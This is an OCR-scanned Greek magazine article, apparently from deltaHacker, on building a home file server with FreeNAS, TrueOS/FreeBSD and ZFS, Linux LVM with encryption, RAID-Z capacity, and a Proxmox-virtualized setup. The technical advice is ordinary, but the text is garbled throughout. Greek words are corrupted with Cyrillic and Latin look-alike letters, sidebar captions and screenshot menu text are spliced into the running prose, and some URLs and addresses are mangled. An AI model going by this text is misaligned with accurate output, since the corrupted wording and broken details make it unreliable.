< р У επιµέρους δίσκων, πειραματιστεἰτε 
µε το σχετικὀ calculator στο www. 


Z Customize drobo.com/products/capacity- 


TrueOS is a console based server running FreeBSD. It ἃ, ү 
includes command-line versions of The Warden Jail πρωτα τον топо του drobo που σας 
management, PBI manager, ΖΕ5 boot environments ⁄ 


(beadm), and other helpful utilities for system ενδια p É ρε 1) ч 


administrators. 


πιεος calculator/index.php (επιλέξτε 


To ηµιέτοιµο NAS 


Το μικρὸ, αθόρυβο κι ενεργειακά 


Μέσα απὀ τον 
installer του PC- 
BSD έχουμε Tn 
δυνατότητα va 
ζητήσουμε την 
εγκατάσταση του 
TrueOS, µιας εκδο- 
Xrjc του FreeBSD 
που βασίζεται πλή- 
ρως στο ΖΕ5. Μετά 
την ολοκλήρωση 
της εγκατάστασης, 
akópr, και το ἰδιο 
TO λειτουργικὀ 
εἶναι πάνω σε ZFS 
pool! 
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EUYEVIKÓ NAS εἶναι πάντα 
δελεαστικὀ! O λίγο nio ψαγμένος 
χρήστης, ωστόσο, εἶναι πιθανὀν να 
μην ικανοποιείται апо ro hardware 
των ἐτοιμων προτάσεων/λύσεων, 
ενδεχομένως οὐτε κι απὀ τις δυνατότητες των αντίστοιχων λειτουργικὠν 
συστημάτων. Па τέτοιες περιπτώσεις, λοιπόν, µια καλή λύση εἶναι να 
διαμορφώνουμµε μόνοι µας ro hardware και μετὰ va εγκαθιστούµε éva 
λειτουργικὀ σύστημα nou εἶναι ειδικἁ σχεδιασμένο για χρήση σε NAS. 
Εξέχον παράδειγµα τέτοιου OS εἶναι το δωρεάν FreeNAS, ro onoio 
βασίζεται στο FreeBSD και μεταξύ ἄλλων υποστηρίζει πλήρως το ZFS 
(www.freenas.org). To FreeNAS εἶναι ὁ,τι πρέπει για ¿vav fileserver και το 
µόνο που έχουμε να του καταλογίσουµε --αλλά ὀχι στα πολύ σοβαρά-- 
εἶναι От! το web panel του δεν ἐχει σχεδιαστεἰ µε γνώμονα τις ανάγκες 
TOU αμύητου χρήστη. Όπως και va ει, προτείνουμε να το κατεβάσετε και 
να το δοκιμάσετε µε την ησυχία σας, N.X., σε εικονικὀ περιβάλλον. 


Cancel 


H προσέγγιση rou DIYer 


Όλες οι προαναφερθείσες προτάσεις εἶναι апо ικανοποιητικὲς έως κι 
άριστες για για την υλοποίηση ενὀς ωραιότατου fileserver, ωστόσο 
αφήνουν µε την αἰσθηση του ανικανοποἰητου εκεἰνον που θέλει va χει 
πλήρη ελευθερία στην επιλογἠ hardware/software αλλά κι απόλυτο 
ἐλεγχο πάνω στο λειτουργικὀ σύστημα. Πέρα апо το hardware, το OS 
στο οποίο θα προσανατολιστεἰ o δημιουργὸς ενὸς fileserver θα εἶναι ἑνα 
εκ των Linux, FreeBSD. 


ο Περίπτωση Linux. Στην πλειονότητα των περιπτώσεων επιλέγε- 
ται µια διανοµἠ μεταξὺ των Debian, CentOS και Ubuntu Server. 
Ανεξάρτητα της διανομής, το σύστημα διαχεἰρισης rou αποθηκευ- 
τικού χώρου αξίζει να εἶναι το LVM (Logical Volume Management). 
Ουσιαστικἁ, πρὀκειται για µια τεχνολογία storage virtualization 
ὁπου πλέον δεν μιλάμε για επιµέρους δίσκους αλλά για δυναμικὲς 
συλλογὲς δίσκων. Па τη λογική του LVM μπορείτε να διαβάσετε στο 
site του περιοδικού (http://deltahacker.gr/?p=1236). Επιπλέον, για 
τη χρήση και την αξιοποίηση του LVM µελετήστε ra σχετικἁ άρθρα: 
http://deltahacker.gr/?p=979 και http://deltahacker.gr/?p=1291. Μη 
διστάσετε να πειραματιστεἰτε µε то LVM, N.X., σε εικονικὀ NEPI- 
βάλλον. Ἑνα anó τα кала του όλου συστήµατος εἰναι ὁτι μπορεί να 
συνδυαστεϊἰ και µε encryption. Ката την εγκατάσταση του Ubuntu 
Server, μάλιστα, παρέχεται δυνατότητα για την αυτόματη δηµι- 
oupyia LVM-based setup µε ταυτόχρονη υποστήριξη encryption. 
Πρόκειται για πολύ ενδιαφέρουσα δυνατότητα που αποκλείει περι- 


Υπάρχει ο απόλυτας File Server? 
Αα 


[ЕТЕШ [EXES 
Q9 pfsense parabing.net - Status: Dashb... + | i freenas - FreeNAS-8.30-RELEASE-p1-.. x | + | 
€ 1921689920 e | (B~ coge о ж D- El- 


Volume Manager 


Volume name [terra 


adal (22 TB) Ë] 
ada2 (22 TB) 
Member disks (3) ada3(22 TB 


urs 


Filesystem type zrs 


Force 4096 bytes sector size 


Enabling dedup may have drastic 
performance implications, as well as impact 
your ability to access your data. Consider 


Deduplication 
using compression instead. 


Group type 


Add Volume 
| Existing data will be cleared 


πτώσεις υποκλοπής δεδομένων, π.χ., µε επανεκιννἠση rou server 
апо live διανομὴ Linux σε CD/USB. 


е FreeBSD, TrueOS, ZFS. 'Eva апо τα μειονεκτήματα του LVM εἶναι 
Оті αποτελεἰ ¿va επἰπεδο λογισμικού πάνω апо ro ὁποιο filesystem, 
επομένως то ὁλο σύστημα εἶναι σχετικἁ περἰπλοκο. Το ZFS, апо 
την ἄλλη, εἶναι µια νέα, σύγχρονη µορφή filesystem µε ενσωµα- 
τωμένο volume manager. Στα ενδιαφέροντα χαρακτηριστικἀ TOU 
συγκαταλέγεται η δηµιουργία datasets µέσα σε ευρύτερα pools. 
Αυτά μπορούμε va ra φανταζόμαστε ως υποκαταλόγους, αλλά µε 
ενδιαφἐρουσες ιδιότητες όπως η αυτόματη συμπἱεση, η αυτόματη 
δημιουργία αντιγράφων σε block-level к.а. Διαβάστε περισσὀτε- 
pa για ro ZFS στο http://deltahacker.gr/?p-977. Σας προτείνουμε 
va πειραματιστεἰτε κιόλας, ὥστε va το εκτιµήσετε καλύτερα. Па 
λόγους που αφορούν σε νομικά ζητήματα, ἁδειες χρήσης κι άλλα 
τέτοια εξαιρετικἀ βαρετὰ, το ZFS δεν το συναντάμε εὐκολα στο 
Linux. Υποστηρίζεται πάντως πλήρως апо ro FreeBSD και διάφο- 
ρες εκδοχὲς του, ónog εἶναι το TrueOS. Το τελευταίο εγκαθἰστα- 
ται μέσα απὀ rov installer του PC-BSD (www.pcbsd.org) κι αποτε- 
Лі µια εκδοχἠ του FreeBSD µε ορισμένες πρόσθετες δυνατότητες 
που ἐρχονται апо το στρατόπεδο του PC-BSD. Auró που κυρίως 
μας ενδιαφἑρει εδώ εἶναι ὁτι, σε αντίθεση µε την περίπτωση rou 
FreeBSD, αμέσως μετὰ την ολοκλήρωση της εγκατάστασης το πε- 
ριβάλλον rou TrueOS εἶναι ZFS-based апо το ἄλφα ως το ὠμέγα, 
υπὀ την ἐννοια ότι ακὀµη και το ἰδιο το λειτουργικό εἶναι πάνω σε 
ZFS pool. Το µόνο како µε το ZFS --και να ξέρετε бт! την Фра που 
ο γράφων πληκτρολόγησε τη λέξη «како» σταμάτησε για να κάνει 
air-quotes— εἶναι ότι για να αποδώσει το μέγιστο των δυνατοτή- 


Δημιουργία všou 
ΖΕ5 volume 
(terra), μέσα απὀ 
то web panel 

Tou FreeNAS, 
αποτελούμενου 
απὀ 3 δίσκους 
χωρητικότητας 2ΤΒ 
ἑκαστος. Το εἶδος 
του νέου volume 
εἶναι RAID-Z. О 
συγκεκριμένος 
τύπος RAID 
παρέχει stripping 
και redundan- 

cy ταυτόχρονα, 
αλλά µε τρόπο 
αποδοτικότερο 

σε σχέση µε το 
«κλασικὀ» RAID-5. 


| = 


H συνολική, ωφέ- 
λιµη χωρητικότητα 
του νέου volume 
εἶναι 4 περίπου 

TB. Γενικά, σε 

éva RAID-Z array 
που συνεχίζει να 
λειτουργεί μετὰ και 
την απώλεια ενός 
δίσκου, ο ωφέλιµος 
χώρος εἰναι (n-1) 

ж s, ὀπουπ»-3 
εἶναι το πλήθος 
των δίκων και 5 

το μέγεθος ενός 

εξ αυτών (όλοι οι 
δίσκοι έχουν το 
ίδιο μέγεθος). 
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ÁN 


Шш = ш c g 


System Network Storage Sharing Services Account Нер Log Out 


expand ай collapse all poss X Settings Х| System Information Х| View Disks X Storage x 


51 Bl Account [Active volumes] ZFS Snapshots Periodic Snapshot Tasks ZFS Replication 
+ @ System 
5) πᾷ Network С 8) [να ЕСИ View Disks 
= ра Storage 
+ D Periodic Snapshot Tasks Volume Path Available Size Status Available actions 
5 {E Replication Tasks 
=) Volumes tera /mnt/terra 40.0 KiB (0%) зэтв 39118 ΗΑΙΤΗΥ | αἴ | | [< (e fmm) (€ mw | 
= Ф /mnt/terra 


5) gi /mnt/terra/deltshacker 
Om Change Permissions 
PR Create ZFS Dataset 
PER Create ZFS Volume 
89 Auto Import Volume 
gf Import volume 
gf View Disks | 
gf view Volumes | 
iif Volume Manager 
= PE ZFS Scrubs 
+J (δὲ Sharing 
5 Ф Services 
ΒΒ Display System Processes 
Shell 
3i Reboot 
(9) shutdown. 


των TOU (βλ., π.χ., υποστήριξη deduplication) χρειάζεται αρκετἠ 
μνήμη RAM. Τα 4GB εἶναι η βάση, µε TIG αξιοπρεπεἰς εγκαταστά- 
σεις να ἐχουν 8GB ἡ περισσότερα. Επίσης, αναλόγως rou pòp- 
TOU που θα δέχεται το σύστημα, η παρουσία ενὸς ἡ δύο δίσκων 
SSD για caching ἰσως αποδειχθεί πολύτιμη. Εμεἰς πάντως χρησι- 
μοποιούμε ката κόρον το ZFS σε vav μικρὸ και ταπεινὸ fileserver 
µε μόλις δύο gigabyte RAM, που aurr| τη στιγμή τρέχει FreeBSD 
9.1-RELEASE. Οι φυσικοὶ δίσκοι του συστήματος εἶναι τέσσερις: 
Ἕνας μικρὸς των 80GB µε το λειτουργικὀὸ και τις εφαρμογές, δύο 
των 400GB κι ἑνας των 1,5TB. Oi τρεις τελευταίοι απαρτίζουν ¿va 
εννιαἰο ZFS pool, µε το πρωτότυπο буора storage. Τώρα, στην 
εποχή που χαμογελάμε µε συμπάθεια κάθε φορά που κάποιος φίλος 
нас μιλά µε θαυμασμὀ για τον καινούργιο εξωτερικὀ του δίσκο του 
ενὸς ñ των δύο terabyte, η συνολική χωρητικότητα του fileserver 
μας σίγουρα δεν εντυπωσιάζει! Апо την ἄλλη, βέβαια, χάρη στο 
ZFS µπορεἰ να μεγαλώσει ὁσο θέλουμε. Προς ro napóv κρίνεται 
ως υπεραρκετἠ yia backup της δουλειάς, καθώς κι εκείνων των 
deltaCast (http://deltahacker.gr/category/deltacast). 


Virtualized fileserver, αλλά ὀχι εντελώς! 


Έχουμε γράψει ξανά γι’ αυτό το πρὀτζεκτ. Εἶναι ο συνδυασμός virtuali- 
zation host και file server. Στον ρὀλο rou hypervizor εἶναι то Proxmox 
ΝΕ (www.proxmox.com) ενώ o fileserver εἶναι φυσικά virtualized, µε guest 
OS το FreeBSD ἡ το TrueOS και υοστήριξη ZFS. Υπάρχει ἑνα ενδιαφἐρον 
«αλλά», εδώ: Οι δίσκοι του εικονικού fileserver δεν εἶναι εικονικοὶ αλλά 
αληθινοί, φυσικοί δίσκοι του host computer. Την ιδέα αυτἠ εξερευνούμε 
στο 8ο επεισόδιο της πρώτης σαιζὀν του deltaCast, που µπορείτε va 
παρακολουθήσετε στο 


http://deltahacker.gr/deltacast-s01e08 


Αναμένουμε τις ιδέες και τις προτάσεις σας eni του όλου θέματος. Πείτε 
μας πώς εἶναι ο fileserver nou ἠδη έχετε ἠ/και πὼς θα εἶναι εκείνος nou 
θα φτιάξετε. Και unv ξεχνάτε, то 83% της διασκέδασης εἶναι η δηµιουρ- 
yia και το υπόλοιπο 17% η μετέπειτα χρήση :) 


H διαφήμισή σας θα 
μπορούσε va εἶναι εδώ. 


Θα μπορούσε να 'ναι και σε κάποια άλλη σελίδα, δηλαδή. 


Αλλά δεν givai. 


Προς το παρόν. 


mus аана < EDOUME i EEDETE i 
ξε DOULIE «. ξέρετε « ¿ma va κάνετε. 


Μην ντρέπεστε, λοιπόν. 


talk2us@deltahacker.gr 


Εμείς πάντως θα σας μιλήσουμε. (3) 
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